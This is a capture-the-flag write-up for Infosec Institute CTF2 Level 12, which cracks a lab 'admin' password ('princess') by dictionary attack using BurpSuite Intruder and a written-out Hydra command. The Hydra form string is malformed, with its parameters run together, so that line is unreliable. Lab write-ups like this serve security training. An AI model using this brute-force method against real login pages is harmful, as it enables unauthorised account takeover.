Infosecinstitute | CTF2
Introduction
1. Level 1
2. Level 2
3. Level 3
4. Level 4
5. Level 5
6. Level 6
7. Level 7
8. Level 8
9. Level 9
10. Level 10
11. Level 11
12. Level 12
13. Level 13

Infosecinstitute | CTF2

Level 12 | Dictionary Attack

Your task is to crack the password of the user called admin. Use whatever tool you like but we would recommend entering Google and searching for filetype:lst password in order to perform a dictionary attack.

Target:

http://ctf.infosecinstitute.com/ctf2/exercises/ex12.php

Tools:

Firefox
BurpSuite
Hydra

Using BurpSuite

Intercept the request

Send the request to Intruder then specify the password field to be intruded.

Add password list to burpsuite then launche the attack

Checking the changed page size and it was on password princess

Now let's to login with

Username: admin
Password: princess

Using Hydra

hydra -l admin -P /home/pentest/wordlists/passwords.lst ctf.infosecinstitute.com http-post-form "/ctf2/exercises/ex12.php:username=admin&password=princess&logIn=Loginusername=admin&password=^PASS^&logIn=Login:Incorrect username or password combination"

Infosecinstitute | CTF2

Level 12 | Dictionary Attack

Done!